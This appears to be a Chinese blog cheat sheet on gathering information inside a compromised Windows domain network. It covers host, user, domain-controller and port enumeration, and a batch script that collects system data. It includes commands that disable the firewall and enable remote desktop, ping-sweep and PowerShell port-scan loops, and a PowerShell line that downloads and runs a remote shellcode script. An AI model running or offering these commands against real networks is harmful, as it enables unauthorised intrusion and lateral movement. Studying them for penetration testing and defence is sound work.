1、本机收集

1.1 系统及软件信息wmic product get name,version查看安装的软件和版本信息1.2 服务信息wmic service list brief 查询本机的服务信息1.3 进程信息tasklist 查看当前进程列表和进程用户wmic process list brief 查看进程信息1.4 杀软识别360sd.exe  360tray.exe  ZhuDongFangYu.exe  SafeDogUpdateCenter.exe  Mcfee McShield.exe  AVP.EXE(卡巴斯基)       avguard.exe(小红伞)     bdagent.exe(bitDefender)1.5 启动程序信息wmic startup get command,caption1.6 计时任务schtasks /query /fo LIST /v1.7 用户列表net user 查看本机用户列表net localgroup administrators 获取本地管理员(通常包含域用户)信息query user || qwinsta  查询当前在线用户1.8 端口信息netstat -ano 可以查看TCP UDP等端口的使用情况1.9 补丁信息systeminfo 查看系统信息wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁信息1.10 本机共享列表net share 查询路由表route print  arp -a1.11 防火墙信息netsh firewall set opmode disablenetsh advfirewall set allprofiles state off (win2003后的系统)  关闭防火墙1.12 代理配置reg query "HKEY_CURRENT)USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"1.13 开启远程连接端口wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__class !="") call setallowtsconnections 1

如下:bat脚本代码

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> xxx.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> xxx.html
wmic USERACCOUNT list full /format:"%var%" >> xxx.html
wmic group list full /format:"%var%" >> xxx.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> xxx.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> xxx.html
wmic netuse list full /format:"%var%" >> xxx.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> xxx.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> xxx.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> xxx.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> xxx.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> xxx.html```

复制为.bat文件,跑完后查看xxx.html

2、查看权限

2.1whoami---查看权限
2.2whoami /all---查看域SID
2.3net user administrator /domain---administrator详细信息

3、是否存在域环境

3.1ipconfig /all判断是否存在域网段划分,dns服务器ip等信息3.2systeminfo查看当前所在的域和域控服务器的计算机名可以通过ping 域控服务器的主机名来获取域控ip查看补丁情况3.3net group "domain admins" /domain通过此命令查询到当前域管理员为"Administrator"3.4net user /domain通过此命令获取当前域内存在的用户名3.5net group "domain computers" /domain通过此选项查看当前加入域内的主机名3.6net time /domain查看域时间及域服务器名

4、主机探活

4.1ICMP协议for /L %I in (1,1,254) DO @ping -w 1 -n 192.168.1.%I | findstr "TTL="
4.2利用nbtscan、arp-scan

5、端口探测

5.1 telnet
5.2 msf扫描auxiliary/scanner/portscan/ack        ACK防火墙扫描auxiliary/scanner/portscan/ftpbounce  FTP跳端口扫描auxiliary/scanner/portscan/syn        SYN端口扫描auxiliary/scanner/portscan/tcp        TCP端口扫描auxiliary/scanner/portscan/xmas       TCP"XMas"端口扫描使用auxiliary/scanner/portscan/tcp模块
5.3 nishanghttps://github.com/samratashok/nishang/blob/master/Scan/Invoke-PortScan.ps1-StartAddress 扫描范围开始地址 -EndAddress 扫描范围结束地址-ScanPort 进行端口扫描-Port 指定端口                                                                                                                           -TimeOut 设置超时时间-ResolveHost 解析主机名扫描存活主机及端口并解析主机名
5,4 nmap

6、域信息

6.1net group "domain computers" /domain探测域内主机
6.2ping存在的主机名,获取域账号的IP地址
6.3批量存活,端口探测。for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

7、找域控

7.1nltest /DCLIST:域名查找域列表
7.2net group"Domain Controllers" /domain查找域控制器
7.3netdom query pdc查找主域控制器

8、获取域用户和域管理信息

8.1 查看域内所有用户net user /domainwmic useraccount get /alldsquery usernet localgroup administrators /domain
8.2 查询域管理员用户组net group"domain admins" /domainnet group"Enterprise Admains" /domain​

9、查找域管进程

     本机检查查找域控制器的域用户会话扫描远程系统上运行的任务查看补丁信息:wmic qfe     *ms14-068,可以用来进行提权,kb3011780查看操作系统类型:wmic os

10、psl脚本收集信息

10.1远程下载IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")
10.2更改执行策略Set-ExecutionPolicy RemoteSigned
10.3端口扫描
10.3.1单个IP扫描1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("127.0.0.1",$_)) "Port $_ is open!"} 2>$null10.3.2IP段中单端口扫描(4.0版本中引用)foreach ($ip in 1..254) {Test-NetConnection -Port 445 -InformationLevel "Detailed" 192.168.1.$ip}10.3.3IP段多端口扫描,1..254 | % { $a = $_; 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}针对某IP段 & 多个端口的扫描器v2,对指定端口进行扫描1..254 | % { $a = $_; write-host "------"; write-host "192.168.1.$a"; 22,53,80,445 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open!"} 2>$null}

补充:bloodhound安装

     kali:执行如下命令apt-get updateapt-get dist-upgradeapt-get install bloodhound终端输入neo4j  console启动,访问地址:http://localhost:7474默认账密neo4j:neo4j再开新终端输入bloodhound

【内网】--信息收集相关推荐

  1. 内网渗透-内网信息收集

    内网信息收集 文章目录 内网信息收集 前言 msf模块中的信息收集 msf反弹shell后的信息收集 内网信息收集 后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们 ...

  2. 《内网安全攻防:渗透测试实战指南》读书笔记(二):内网信息收集

    目录 前言 一.收集本机信息 1.手动搜集 (1)查询网络配置 (2)查询操作系统及软件的信息 (3)查询本机服务信息 (4)查询进程列表 (5)查看启动程序信息 (6)查看计划任务 (7)查看主机开 ...

  3. 内网信息收集(超级全)

    内网信息收集 文章首发与奇安信攻防社区 https://forum.butian.net/share/236 简介 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质 ...

  4. 红队笔记-1(主机发现,情报收集,内网信息收集)

    文章目录 一. 信息收集 主机发现 NMAP 工作原理 扫描方式 nmap 输出选项 nmap高级扫描 nmap脚本爆破服务 绕IDS&IPS nmap优缺点 masscan nbtscan ...

  5. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  6. windows内网信息收集

    前言: 进入内网之后,是一种由点到线再到面的测试,先弄清楚当前机器的情况,如在域中角色,提供的服务等信息:再以此为跳板收集其它机器的信息,当收集的信息足够多,拿下域控的可能型也就越高. 本机信息收集 ...

  7. [内网安全]四.内网信息收集--BloodHound工具与PowerShell工具的使用

    作为网络安全爱好者,对内网的渗透学习必不可少.因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识:另一方面是分享与读者,希望大家一起进步.这系列文章入门部分将参考徐焱老 ...

  8. 内网信息收集(Windows)--本机信息收集

    文章目录 手动查询命令 本机网络配置信息 查询操作系统信息和软件信息 查询本机服务信息 查询进程信息 启动程序信息 查看计划任务 查询用户列表 net session 端口信息 补丁信息 本机共享列表 ...

  9. 内网信息收集——工作组/域信息收集

    1. 查询网络配置 查询网络配置:ipconfig /all C:\Users\hehao>ipconfig /allWindows IP 配置主机名 . . . . . . . . . . . ...

  10. 内网渗透之内网信息收集(综合)

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

最新文章

  1. Your stream was neither an OLE2 stream, nor an OOXML stream.问题的解决
  2. 2021年,神经科学AI有这几大趋势
  3. 8大领域、6大机遇!读懂2020年AI医疗新风向
  4. 前端代码标准最佳实践:CSS篇
  5. python自动化测试视频百度云-python接口自动化测试视频教程全集
  6. C++ const成员Demo - Win32 版本
  7. 【python图像处理】python绘制饼状图
  8. 如何采集指定年份的poi_房价关键影响因素分析:从数据采集到建模全过程
  9. CCF 201312-4 有趣的数
  10. 百度地图根据经纬度获取地址
  11. CGAffineTransform 放射变换
  12. PostgreSQL 配置内存参数
  13. 通过hsv筛选颜色 python_OpenCV-Python 光流介绍(附代码)
  14. 树分解 宽度 如何分解 算法
  15. [中铁六局北京铁建公司]举办的演讲比赛所使用的界面(现场抓拍照片)
  16. 公司年会要求搞一个抽奖程序,及时安排一波
  17. lol超长id注册手把手教程 第一期
  18. 计算机vfp题库知识,全国计算机vfp二级考试题库(超全).docx
  19. ECharts 饼图切换数据源bug 开始没数据显示 切换或刷新后显示
  20. 程序员必备的十四款工具,你都用过吗?

热门文章

  1. java驱动如何安装_java环境安装Firefox驱动/IE驱动
  2. 数据圆整ROUNDUP|DOWN
  3. 宁波银行 金融科技部 开发 面经
  4. 2022年安全员-C证考试内容及安全员-C证最新解析
  5. Camera1.0和Camear2.0的区别
  6. 安卓软件设置开机自启动
  7. 七、基于FPGA的Flash控制器设计
  8. linux java项目 编译报错_Linux下执行Java程序报错
  9. 消防接警员计算机应用能力,关于消防规范指挥中心接警调度员队伍建设
  10. 对于微信小程序开发的想法